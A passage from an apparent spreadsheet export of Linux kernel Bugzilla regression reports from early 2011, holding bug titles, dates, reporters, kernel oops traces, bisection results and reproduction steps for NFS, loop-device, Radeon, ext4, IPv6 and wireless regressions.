    <t>In 2.6.36.3, I can quite quickly (~1 hour) get the following under some workload: Feb 12 00:17:12 10.10.10.102 kernel: BUG: soft lockup - CPU#3 stuck for 67s! [postmaster:27813] Feb 12 00:17:12 10.10.10.102 kernel: Modules linked in: dm_mod mlx4_ib mlx4_core sata_nv 3w_9xxx Feb 12 00:17:12 10.10.10.102 kernel: CPU 3 Feb 12 00:17:12 10.10.10.102 kernel: Modules linked in: dm_mod mlx4_ib mlx4_core sata_nv 3w_9xxx Feb 12 00:17:12 10.10.10.102 kernel: Feb 12 00:17:12 10.10.10.102 kernel: Pid: 27813, comm: postmaster Not tainted 2.6.36.3.xdi #6 S2892/empty Feb 12 00:17:12 10.10.10.102 kernel: RIP: 0010:[&lt;ffffffff81055033&gt;] [&lt;ffffffff81055033&gt;] bit_waitqueue+0xc3/0xd0 Feb 12 00:17:12 10.10.10.102 kernel: RSP: 0018:ffff880039e7ba48 EFLAGS: 00000292 Feb 12 00:17:12 10.10.10.102 kernel: RAX: ffff880001877b30 RBX: 0000000000000d12 RCX: 0000000000000034 Feb 12 00:17:12 10.10.10.102 kernel: RDX: ffff880100000e00 RSI: 0000000000000000 RDI: 8038000000000000 Feb 12 00:17:12 10.10.10.102 kernel: RBP: ffffffff8100354e R08: 023ee891c01c0000 R09: fda317fdfa087007 Feb 12 00:17:12 10.10.10.102 kernel: R10: 0000000000000001 R11: 0000000000000000 R12: ffff880001877b30 Feb 12 00:17:12 10.10.10.102 kernel: R13: fda317fdfa087007 R14: 0000000000000001 R15: 0000000000000000 Feb 12 00:17:12 10.10.10.102 kernel: FS: 000000004087c940(0063) GS:ffff880001b80000(0000) knlGS:0000000000000000 Feb 12 00:17:12 10.10.10.102 kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Feb 12 00:17:12 10.10.10.102 kernel: CR2: 000000000042b000 CR3: 000000003b87e000 CR4: 00000000000006e0 Feb 12 00:17:12 10.10.10.102 kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Feb 12 00:17:12 10.10.10.102 kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Feb 12 00:17:12 10.10.10.102 kernel: Process postmaster (pid: 27813, threadinfo ffff880039e7a000, task ffff880133f91880) Feb 12 00:17:12 10.10.10.102 kernel: Stack: Feb 12 00:17:12 10.10.10.102 kernel: ffff88023ee891c0 ffffffff813b98e8 ffff88023ee891c0 0000000000000007 Feb 12 00:17:12 10.10.10.102 kernel: &lt;0&gt; 0000000000000001 ffff880133f91880 ffffffff810550e0 ffff880039e7ba80 Feb 12 00:17:12 10.10.10.102 kernel: &lt;0&gt; ffff880039e7ba80 ffffffffffffff10 ffffffff8100372e ffff88023ee89130 Feb 12 00:17:12 10.10.10.102 kernel: Call Trace: Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff813b98e8&gt;] ? out_of_line_wait_on_bit_lock+0x28/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810550e0&gt;] ? wake_bit_function+0x0/0x40 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff8100372e&gt;] ? reschedule_interrupt+0xe/0x20 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81133489&gt;] ? nfs_commit_inode+0xb9/0x1c0 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff811337a9&gt;] ? nfs_wb_page+0x69/0xc0 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81133ce1&gt;] ? nfs_flush_incompatible+0x41/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81124c9f&gt;] ? nfs_write_begin+0x8f/0x220 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81081638&gt;] ? generic_file_buffered_write+0x118/0x280 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff813b8c63&gt;] ? schedule+0x273/0x900 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81083419&gt;] ? __generic_file_aio_write+0x229/0x420 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81035aa3&gt;] ? load_balance+0x133/0x700 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81083677&gt;] ? generic_file_aio_write+0x67/0xe0 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81125ad1&gt;] ? nfs_file_write+0xe1/0x230 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff8104a472&gt;] ? get_signal_to_deliver+0x92/0x350 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810c2abf&gt;] ? do_sync_write+0xbf/0x100 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff813b8c63&gt;] ? schedule+0x273/0x900 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810c31f6&gt;] ? vfs_write+0xc6/0x180 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810c350e&gt;] ? sys_write+0x4e/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81040276&gt;] ? sys_gettimeofday+0x36/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81002c6b&gt;] ? system_call_fastpath+0x16/0x1b Feb 12 00:17:12 10.10.10.102 kernel: Code: 00 fa 6c 81 48 8d 2c 29 b9 40 00 00 00 2b 8a 90 06 00 00 48 d3 ed 48 8d 44 6d 00 48 c1 e0 03 48 03 82 80 06 00 00 48 83 c4 08 5b &lt;5d&gt; c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 18 48 8d 47 08 Feb 12 00:17:12 10.10.10.102 kernel: Call Trace: Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff813b98e8&gt;] ? out_of_line_wait_on_bit_lock+0x28/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810550e0&gt;] ? wake_bit_function+0x0/0x40 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff8100372e&gt;] ? reschedule_interrupt+0xe/0x20 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81133489&gt;] ? nfs_commit_inode+0xb9/0x1c0 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff811337a9&gt;] ? nfs_wb_page+0x69/0xc0 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81133ce1&gt;] ? nfs_flush_incompatible+0x41/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81124c9f&gt;] ? nfs_write_begin+0x8f/0x220 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81081638&gt;] ? generic_file_buffered_write+0x118/0x280 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff813b8c63&gt;] ? schedule+0x273/0x900 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81083419&gt;] ? __generic_file_aio_write+0x229/0x420 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81035aa3&gt;] ? load_balance+0x133/0x700 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81083677&gt;] ? generic_file_aio_write+0x67/0xe0 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81125ad1&gt;] ? nfs_file_write+0xe1/0x230 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff8104a472&gt;] ? get_signal_to_deliver+0x92/0x350 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810c2abf&gt;] ? do_sync_write+0xbf/0x100 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff813b8c63&gt;] ? schedule+0x273/0x900 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810c31f6&gt;] ? vfs_write+0xc6/0x180 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff810c350e&gt;] ? sys_write+0x4e/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81040276&gt;] ? sys_gettimeofday+0x36/0x90 Feb 12 00:17:12 10.10.10.102 kernel: [&lt;ffffffff81002c6b&gt;] ? system_call_fastpath+0x16/0x1b I cannot reproduce it in 2.6.35.11.</t>
  </si>
  <si>
    <t>Internet Speed Drops When Using Wireless</t>
  </si>
  <si>
    <t>2011-02-13 19:10 UTC</t>
  </si>
  <si>
    <t>Jay LaCroix</t>
  </si>
  <si>
    <t>2011-06-28 18:11 UTC</t>
  </si>
  <si>
    <t>I am currently using kernel 2.6.38-rc4, and I notice that when using wireless, my Internet speed drops so low that it can be impossible to use at times. With 2.6.37, my speed while using wireless (wireless N) according to speakeasy.net speed test is up to 12mbps, but with 2.6.38-rc4 I'm lucky to get above 1MBps, and quite often it will drop to 1.4kbs. Youtube videos are impossible to watch with 2.6.38-rc4, taking an average of a half hour for a five minute video to load. No problems at all with 2.6.37. If I use a wired connection with 2.6.38-rc4, I have no issues. The card I use is an Atheros AR5B91 which normally has excellent out of the box Linux support. My laptop is a Dell Latitude E6410. Let me know if there are any logs you guys need, this is the first time I ever submitted a bug against the mainline kernel.</t>
  </si>
  <si>
    <t>Tonnes of messages [drm:ironlake_crtc_disable] *ERROR* failed to disable transcoder</t>
  </si>
  <si>
    <t>2011-02-14 05:51 UTC</t>
  </si>
  <si>
    <t>2012-04-18 21:43 UTC</t>
  </si>
  <si>
    <t>The system (a Dell Latitude E6510) seems to work fine but I see a lot of these messages in the /var/log/messages. No other failures around these messages either. Are these harmless?</t>
  </si>
  <si>
    <t>releasing loop on top of other loop leads to deadlock</t>
  </si>
  <si>
    <t>2011-02-15 10:00 UTC</t>
  </si>
  <si>
    <t>Petr Uzel</t>
  </si>
  <si>
    <t>2011-03-06 12:33 UTC</t>
  </si>
  <si>
    <t>Following steps lead to deadlock in kernel: dd if=/dev/zero of=img bs=512 count=1000 losetup -f img mkfs.ext2 /dev/loop0 mount -t ext2 -o loop /dev/loop0 mnt umount mnt/ The umount gets stuck in the kernel (verified with strace). Stacktrace: [ 609.086012] umount D 0000000000000000 0 3832 3831 0x00000001 [ 609.086012] ffff8800ae4c9d90 0000000000000086 ffff8800b882f830 0000000000012640 [ 609.086012] ffff8800ae4c9fd8 0000000000012640 ffff8800ae4c9fd8 ffff8800ae4c9fd8 [ 609.086012] ffff8800ae58e5b0 0000000000012640 0000000000012640 ffff8800ae4c8000 [ 609.086012] Call Trace: [ 609.086012] [&lt;ffffffff8152197b&gt;] __mutex_lock_slowpath+0x11b/0x1d0 [ 609.086012] [&lt;ffffffff8152151a&gt;] mutex_lock+0x1a/0x40 [ 609.086012] [&lt;ffffffff8118583d&gt;] __blkdev_put+0x3d/0x190 [ 609.086012] [&lt;ffffffff811547fe&gt;] __fput+0xae/0x240 [ 609.086012] [&lt;ffffffffa0579b8b&gt;] loop_clr_fd+0x1fb/0x260 [loop] [ 609.086012] [&lt;ffffffffa0579c6a&gt;] lo_release+0x7a/0x80 [loop] [ 609.086012] [&lt;ffffffff811858d0&gt;] __blkdev_put+0xd0/0x190 [ 609.086012] [&lt;ffffffff81155573&gt;] deactivate_locked_super+0x43/0x70 [ 609.086012] [&lt;ffffffff811705a9&gt;] sys_umount+0x59/0xd0 [ 609.086012] [&lt;ffffffff8100318b&gt;] tracesys+0xd9/0xde [ 609.086012] [&lt;00007f222827f8c7&gt;] 0x7f222827f8c7 This is a regression. It broke somewhere between 2.6.36 and 2.6.37. I tried bisecting[*] the problem, which resulted in commit 5704e44d283 being identified as the first bad commit. This looks weird to me: I would rather suspect commit 2a48fc0ab24241755dc9, which introduced the private loop_mutex as part of the BKL removal process. From the stacktrace it seems to depend on the LO_FLAGS_AUTOCLEAR flag set. I removed the locking/unlocking of loop_mutex from lo_release() and the problem disappeared. I don't know if this is the proper solution as I don't understand why/if anything in the loop_clr_fd() needs to be protected by the loop_mutex. [*] For the first time, so it is likely that I did something wrong.</t>
  </si>
  <si>
    <t>2.6.38-rc3: Battery not seen after boot, sometimes comes back after plugging</t>
  </si>
  <si>
    <t>2011-02-15 21:57 UTC</t>
  </si>
  <si>
    <t>2011-02-19 13:42 UTC</t>
  </si>
  <si>
    <t>This entry tracks the original issue of bug #28642 and should be closed if that problem is solved in the mainline kernel.</t>
  </si>
  <si>
    <t>2.6.38-rc: fuse BUG, maybe related to detaching external usb drive without umounting</t>
  </si>
  <si>
    <t>2011-02-15 22:05 UTC</t>
  </si>
  <si>
    <t>2011-06-11 15:05 UTC</t>
  </si>
  <si>
    <t>29352 29492 29792</t>
  </si>
  <si>
    <t>This entry is used to track the second(?) issue of bug #28642. It should be closed when the issue is fixed in the mainline kernel. In https://bugzilla.kernel.org/show_bug.cgi?id=28642#c7 Adam Kovari wrote: &gt; In the dmesg I attached, there is one more trace which is something about &gt; fs/inode. That I find strange, so I just put it here too: &gt; &gt; ------------[ cut here ]------------ &gt; kernel BUG at fs/inode.c:1421! &gt; invalid opcode: 0000 [#2] PREEMPT SMP &gt; last sysfs file: &gt; /sys/devices/pci0000:00/0000:00:1f.2/host0/target0:0:0/0:0:0:0/block/sda/uevent &gt; CPU 0 &gt; Modules linked in: tun ipv6 snd_hda_codec_hdmi ses snd_hda_codec_idt arc4 &gt; enclosure ecb snd_hda_intel iwlagn i915 usb_storage snd_hda_codec uvcvideo &gt; videodev iwlcore drm_kms_helper sdhci_pci mac80211 uas v4l2_compat_ioctl32 drm &gt; snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss &gt; snd_hwdep sdhci iTCO_wdt intel_agp lp firewire_ohci dell_wmi i2c_algo_bit &gt; sparse_keymap snd_mixer_oss ppdev ehci_hcd i2c_i801 mmc_core usbcore parport_pc &gt; processor cfg80211 parport i2c_core iTCO_vendor_support sg wmi dell_laptop &gt; intel_ips firewire_core e1000e snd_pcm intel_gtt battery button video container &gt; ac serio_raw psmouse pcspkr evdev dcdbas rfkill snd_timer snd soundcore &gt; snd_page_alloc crc_itu_t fuse ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod ahci &gt; libahci libata scsi_mod &gt; &gt; Pid: 11485, comm: umount Tainted: G D W 2.6.38-rc3-mainline #1 &gt; 0667CC/Latitude E6410 &gt; RIP: 0010:[&lt;ffffffff8114b6f0&gt;] [&lt;ffffffff8114b6f0&gt;] iput+0x240/0x2a0 &gt; RSP: 0018:ffff88011556dda8 EFLAGS: 00010202 &gt; RAX: 0000000000000000 RBX: ffff880117828800 RCX: 0000000000000000 &gt; RDX: 0000000000000016 RSI: ffffffff8155d480 RDI: ffff880117828800 &gt; RBP: ffff88011556ddb8 R08: fffffffcfffffffc R09: fffffffcfffffffc &gt; R10: 00032034fffffffc R11: fffffff0fffffff8 R12: 0000000000000000 &gt; R13: 0000000000000083 R14: ffff880117828720 R15: ffff880117828380 &gt; FS: 00007fbcf1e02740(0000) GS:ffff8800db400000(0000) knlGS:0000000000000000 &gt; CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b &gt; CR2: 00007f0448176fc0 CR3: 0000000116e71000 CR4: 00000000000006f0 &gt; DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 &gt; DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 &gt; Process umount (pid: 11485, threadinfo ffff88011556c000, task ffff8801154ecc50) &gt; Stack: &gt; ffff880117828700 0000000000000000 ffff88011556de08 ffffffff811659a7 &gt; ffff88011556ddf8 ffffffffa0026e80 ffff88011556df28 ffff880117828700 &gt; 0000000000000083 ffff880117828720 ffff88011556df01 ffff880001813000 &gt; Call Trace: &gt; [&lt;ffffffff811659a7&gt;] __blkdev_put+0x137/0x1c0 &gt; [&lt;ffffffff81165b01&gt;] blkdev_put+0xd1/0x170 &gt; [&lt;ffffffff811345f9&gt;] kill_block_super+0x49/0x80 &gt; [&lt;ffffffffa011f98d&gt;] fuse_kill_sb_blk+0x4d/0x60 [fuse] &gt; [&lt;ffffffff81134955&gt;] deactivate_locked_super+0x45/0x60 &gt; [&lt;ffffffff81135735&gt;] deactivate_super+0x45/0x60 &gt; [&lt;ffffffff8114fc8a&gt;] mntput_no_expire+0x9a/0xe0 &gt; [&lt;ffffffff81150787&gt;] sys_umount+0x67/0x390 &gt; [&lt;ffffffff8100bdd2&gt;] system_call_fastpath+0x16/0x1b &gt; Code: 41 00 83 05 c6 86 5f 00 01 48 89 05 6b 48 41 00 48 89 42 08 48 89 93 88 &gt; 00 00 00 48 c7 83 90 00 00 00 40 ff 55 81 e9 4f fe ff ff &lt;0f&gt; 0b be 6e 05 00 00 &gt; 48 c7 c7 0a f8 47 81 e8 8d b3 f0 ff 48 8b &gt; RIP [&lt;ffffffff8114b6f0&gt;] iput+0x240/0x2a0 &gt; RSP &lt;ffff88011556dda8&gt; &gt; dell-wmi: Received unknown WMI event (0x11) &gt; e1000e: eth0 NIC Link is Up 100 Mbps Full Duplex, Flow Control: None &gt; e1000e 0000:00:19.0: eth0: 10/100 speed: disabling TSO &gt; ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready &gt; ---[ end trace bc079d007ab92181 ]---</t>
  </si>
  <si>
    <t>[VT-d] VT-d device passthrough fail to guest</t>
  </si>
  <si>
    <t>2011-02-16 08:56 UTC</t>
  </si>
  <si>
    <t>2011-03-04 20:34 UTC</t>
  </si>
  <si>
    <t>Environment: ------------ Host OS : IA32E Guest OS : IA32E kvm.git Commit: a685b38e272587e644fedd37269ddb82df21c052 qemu-kvm Commit: 671d89d6411655bb4f8058ce6eb86bb0bb8ec978 Host Kernel Version: 2.6.38-rc4 Bug detailed description: -------------------------- When assign one PCI/e device to guest, qemu report error and guest can not boot up. If do hot-add device to guest, qemu will be killed. [root@vt-nhm9 qemu-kvm]# qemu-system-x86_64 -m 512 -smp 2 -device pci-assign,host=13:00.0 -net none -hda /path/rhel5.img assigned_dev_pci_read: pread failed, ret = 0 errno = 22 Reproduce steps: ---------------- 1) install latest kvm and qemu-kvm 2) qemu-system-x86_64 -m 512 -smp 2 -device pci-assign,host=13:00.0 -net none -hda /path/rhel5.img 3) there will be a qemu error</t>
  </si>
  <si>
    <t>IPv6 doesn't work in a kvm guest.</t>
  </si>
  <si>
    <t>2.6.38-rc5</t>
  </si>
  <si>
    <t>2011-02-16 13:03 UTC</t>
  </si>
  <si>
    <t>Kusanagi Kouichi</t>
  </si>
  <si>
    <t>2011-03-14 17:24 UTC</t>
  </si>
  <si>
    <t>apt-get and ping6 don't work in a kvm guest. It appears that neighbor discovery is not working. I'm using tap, virtio-net and vhost. I did bisect and results is d80bc0fd262ef840ed4e82593ad6416fa1ba3fc4 is the first bad commit commit d80bc0fd262ef840ed4e82593ad6416fa1ba3fc4 Author: David S. Miller &lt;davem@davemloft.net&gt; Date: Mon Jan 24 16:01:58 2011 -0800 ipv6: Always clone offlink routes. Do not handle PMTU vs. route lookup creation any differently wrt. offlink routes, always clone them. Reported-by: PK &lt;runningdoglackey@yahoo.com&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; :040000 040000 c4a34e9e36bd8cc81e898738f2d4344f6647d472f0fcd4b093ec22784798f3951203391f4567b278 M net reverting this commit for guest kernel fixes the probrem.</t>
  </si>
  <si>
    <t>[BISECTED] Screen becomes corrupted when switching video mode with Radeon KMS</t>
  </si>
  <si>
    <t>2011-02-17 00:52 UTC</t>
  </si>
  <si>
    <t>2011-02-20 00:15 UTC</t>
  </si>
  <si>
    <t>After updating the kernel to 2.6.38-rc5 screen gets corrupted when video mode switches for KMS. This is on laptop eMachines E640G with integrated ATI Mobility Radeon HD 5470. It was working just fine with -rc4. I have bisected the commits and this one was pointed out as the culprit: 5b40ddf888398ce4cccbf3b9d0a18d90149ed7ff is the first bad commit commit 5b40ddf888398ce4cccbf3b9d0a18d90149ed7ff Author: Alex Deucher &lt;alexdeucher@gmail.com&gt; Date: Mon Feb 14 11:43:11 2011 -0500 drm/radeon/kms: hopefully fix pll issues for real (v3) The problematic boards have a recommended reference divider to be used when spread spectrum is enabled on the laptop panel. Enable the use of the recommended reference divider along with the new pll algo. v2: testing options v3: When using the fixed reference divider with LVDS, prefer min m to max p and use fractional feedback dividers. Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=28852 https://bugzilla.kernel.org/show_bug.cgi?id=24462 https://bugzilla.kernel.org/show_bug.cgi?id=26552 MacbookPro issues reported by Justin Mattock &lt;justinmattock@gmail.com&gt; Signed-off-by: Alex Deucher &lt;alexdeucher@gmail.com&gt; Cc: stable@kernel.org Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; :040000 040000 8736f993b97cc8370fd29048761a1e0da4969306 657bdb221e3f4da6efdfec02f8f348db5a537b29 M drivers</t>
  </si>
  <si>
    <t>Panic: Unable to handle kernel paging request</t>
  </si>
  <si>
    <t>2011-02-18 14:58 UTC</t>
  </si>
  <si>
    <t>Seb Lu</t>
  </si>
  <si>
    <t>2012-05-12 15:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 48302 [details] screeb dump ello, I have an kvm host which kernel panic frequently. extract from lshw product: PowerEdge M610 vendor: Dell Inc. version: PowerEdge M1000e product: Intel(R) Xeon(R) CPU X5650 @ 2.67GHz # uname -a Linux hkvm-cap-2 2.6.35.7 #1 SMP Mon Oct 25 15:28:33 UTC 2010 x86_64 GNU/Linux # kvm --version QEMU emulator version 0.13.0 (qemu-kvm-0.13.0), Copyright (c) 2003-2008 Fabrice Bellard # dpkg -l|grep -e libvirt ii libvirt-bin 0.8.7-1+sj1 the programs for the libvirt library ii libvirt0 0.8.7-1+sj1 library for interfacing with different virtualization systems ii python-libvirt 0.8.7-1+sj1 libvirt Python bindings I've take some screenshot from idrac about kernel panic trace. Do you have preconisation about this? Regards,</t>
  </si>
  <si>
    <t>kernel panics while running ffsb scalability workloads on 2.6.38-rc1 through -rc5</t>
  </si>
  <si>
    <t>2011-02-18 21:47 UTC</t>
  </si>
  <si>
    <t>Eric Whitney</t>
  </si>
  <si>
    <t>2011-03-14 17:25 UTC</t>
  </si>
  <si>
    <t>Created attachment 48352 [details] captured console output - spinlock bad magic: ext4lazyinit The 2.6.38-rc5 kernel can panic while running any one of the ffsb profiles in http://free.linux.hp.com/~enw/ext4/profiles on an ext4 filesystem on a 48 core x86 system. These panics occur most frequently using the 48 or 192 thread versions of those profiles. The problem has been reproduced on a 16 core x86 system using identical storage, but occurs there at lower frequency. On average, it takes only two runs of "large_file_creates_threads-192.ffsb" to produce a panic on the 48 core system. The panics occur more or less equally frequently on a vanilla ext4 filesystem, ext4 filesystem without a journal, and an ext4 filesystem with a journal but mounted with mblk_io_submit. With various debugging options enabled including spinlock debugging, panics or oopses or BUGS occur in four varieties: protection violation, invalid opcode, NULL pointer, and spinlock bad magic. Typically, the first fault triggers a cascade of subsequent oopses, etc. These panics can be suppressed by using -E lazy_itable_init at mkfs time. The test system survived two series of 10 ffsb tests beginning with a single mkfs each. Subsequently, the system survived a run of about 16 hours in which a complete scalability measurement pass was made Repeated ffsb runs on ext3 and xfs filesystems on 2.6.38-rc* have not produced panics. Numerous previous ffsb scalability runs on ext4 and 2.6.37 did not produce panics. The panics can be produced using either HP SmartArray (backplane RAID) or FibreChannel storage with no material difference in the panic backtraces. Attempted bisection of the bug in 38-rc1 was inconclusive. Repeatability was lost the earlier in -rc1 I got. The last clear indication was in the midst of perf changes very early in the release (SHA id beginning with 006b20fe4c, "Merge branch 'perf/urgent' into perf/core"). Preceding that are RCU and GFS patches, plus a small number of x86 patches. Relatively little useful spinlock debugging information was reported in repeated tests in early 38 rc's - with later rc's, more information gradually became visible (or maybe I was just getting progressively more lucky). The first attachment contains the partial backtrace that most clearly suggests lazy_itable_init involvement. The softirq portion of this backtrace tends to look the same across the panics I've seen.</t>
  </si>
  <si>
    <t>fans running at full-speed after resume from suspend with radeon and KMS</t>
  </si>
  <si>
    <t>2.6.38-rc5+</t>
  </si>
  <si>
    <t>2011-02-18 22:46 UTC</t>
  </si>
  <si>
    <t>Jon Dowland</t>
  </si>
  <si>
    <t>2012-04-16 23:36 UTC</t>
  </si>
  <si>
    <t>Alex Deucher</t>
  </si>
  <si>
    <t>Hi, Originally reported against the wrong product, here: https://bugzilla.kernel.org/show_bug.cgi?id=18552 I have an ATI Radeon X850XT PCIE card plugged into an Intel DG35EC motherboard. With kernels since 2.6.32-rc1 and most recently tested with mainline commit 2a324ce7b79a3a90cc2d4ade5d5f960a99000caa (2.6.38-rc5+), if I attempt a suspend-to-ram, upon resume, the fan on my ATI card remains at full speed (loud), and does not throttle back to quiet (normal behaviour). Booting with 'radeon.modeset=0' prevents this. Please let me know what further information is needed. Thanks!</t>
  </si>
  <si>
    <t>2.6.37.1 breaks tpm_tis</t>
  </si>
  <si>
    <t>2.6.37.1</t>
  </si>
  <si>
    <t>2011-02-19 18:58 UTC</t>
  </si>
  <si>
    <t>Michael Lipp</t>
  </si>
  <si>
    <t>2011-03-06 12:08 UTC</t>
  </si>
  <si>
    <t>After upgrading from 2.6.37 to 2.6.37.1 there is some problem with tpm_tis. During boot I get: Feb 19 19:22:42 lipp-nb kernel: [ 9.664344] tpm_tis 00:04: 1.2 TPM (device-id 0xB, rev-id 16) Feb 19 19:22:42 lipp-nb kernel: [ 10.000017] tpm_tis 00:04: Operation Timed out The real problem occurs when I later try to go to standby: Feb 19 13:00:25 lipp-nb kernel: [ 174.292169] tpm_tis 00:04: Operation Timed out Feb 19 13:00:25 lipp-nb kernel: [ 174.292177] legacy_suspend(): pnp_bus_suspend+0x0/0x70 returns -62 Feb 19 13:00:25 lipp-nb kernel: [ 174.292181] PM: Device 00:04 failed to suspend: error -62 I'm sorry, but that's all there is. The only additional information I have is that it is an infineon device (tpm_infineon gets loaded as well). After unloading all tpm* modules, stand by works again.</t>
  </si>
  <si>
    <t>Change to legacy algo to preferring lower post dividers breaks certain modelines</t>
  </si>
  <si>
    <t>2011-02-20 02:29 UTC</t>
  </si>
  <si>
    <t>2011-03-04 23:41 UTC</t>
  </si>
  <si>
    <t>There's an issue with some legacy chips plus low dotclocks in the 2.6.38-rc5 kernel, This is the change/patch that broke them. Reverting this patch, they work as they did before... "Also, switch the legacy algo back to preferring lower post dividers." @@ -849,7 +951,7 @@ void radeon_compute_pll(struct radeon_pll *pll, max_fractional_feed_div = pll-&gt;max_frac_feedback_div; } - for (post_div = max_post_div; post_div &gt;= min_post_div; --post_div) { + for (post_div = min_post_div; post_div &lt;= max_post_div; ++post_div) { uint32_t ref_div; if ((pll-&gt;flags &amp; RADEON_PLL_NO_ODD_POST_DIV) &amp;&amp; (post_div &amp; 1)) A person has a ATI Radeon 9200SE 5964 (AGP)and with 2.6.38-rc4-git4+ it works while with 2.6.38-rc5 there are certain (not all) modelines with low dotclocks that end up being totally out of sync. Here's an example of a non-working modeline for him with the newer kernel, vs. the older one step back before the patch with the above change... # toki 256x224@59.61 15.6774Khz ModeLine "256x224x59.61" 5.518455 256 272 304 352 224 235 238 263 -HSync -VSync There's a lot of other ones thought that can work with the same lower dotclocks, so I'm not sure why that is, he tested that change with the legacy pll computation reversed back to how it was and now works again with modelines like the above. Thanks, Chris</t>
  </si>
  <si>
    <t>v2.6.38-rc5 drm:radeon regression</t>
  </si>
  <si>
    <t>2011-02-21 20:02 UTC</t>
  </si>
  <si>
    <t>2011-02-23 19:28 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.38-rc5 drm:radeon regression Submitter : Jörg Otte &lt;jrg.otte@googlemail.com&gt; Date : 2011-02-18 11:47 Message-ID : AANLkTi=6x93A11MzAjKyqO+7aP3t7QD8eMh7XVWp8GD6@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=129803001230359&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kworker consumes ~100% CPU on HP Elitebook 8540w after resume</t>
  </si>
  <si>
    <t>2011-02-23 11:49 UTC</t>
  </si>
  <si>
    <t>2011-03-28 23:04 UTC</t>
  </si>
  <si>
    <t>With the patch for #20232 on top of 2.6.37, the issue returns after a suspend/resume cycle.</t>
  </si>
  <si>
    <t>rndis_wlan not working again for BCM4320a</t>
  </si>
  <si>
    <t>2011-02-23 12:29 UTC</t>
  </si>
  <si>
    <t>Created attachment 48752 [details] Syslogs for rndis_wlan with 2.6.38-rc5 I've been testing the 2.6.368 kernel with my wireless adapter and it seems that something is not well once again. I'm attaching the logs of four test sets. All tests were performed after booting the computer with the device disconnected and only connecting it after everything is ready on the desktop. The attachments show what came up on the syslog after the moment I plugged in the device. - On the first test, I disabled network-manager and only used iwconfig + dhclient. I got no connection and the adapter's "Link" LED just kept blinking as if nothing was happening. - For all other tests I enabled network-manager. On the second test, after about an hour with the device connected, it hadn't connected yet and my ESSID didn't shown up on n-m's available connections. I used iwconfig + dhclient to configure the device. No success yet. N-m caught the SSID by then but it couldn't connect neither. - On the third test, the SSID was detected about 5 minutes after I plugged the device. The connection was not successful. I left the computer idle for some hours and when I returned, I clicked the network's name on network-manager's list. It connected and all seemed well. However, 15 minutes later, the device disconnected. On the log you can see n-m retrying to connect without success. After it gave up, I tried to connect manually again. No success. - On the fourth test, n-m connected automatically after about 25 minutes. Unfortunately, after other 25 mins it disconnected and couldn't reconnect again. So, it seems to me that we have two (or three?) issues/symptoms here again: - The scan results seem to be poor again, as reported on Bug #20822. The "alternative scan mode" patch that significantly improved it for 2.6.37 seems to be present, but maybe something is preventing it from working correctly? - It seems that as soon as the connection is established, the device disconnects. - I noticed that sometimes there are looping messages from wpa_supplicant saying that it is "Trying to associate" with my router, but then it says that "Authentication with 00:00:00:00:00:00 timed out". Notice the 00s. Best regards, Pitxyoki</t>
  </si>
  <si>
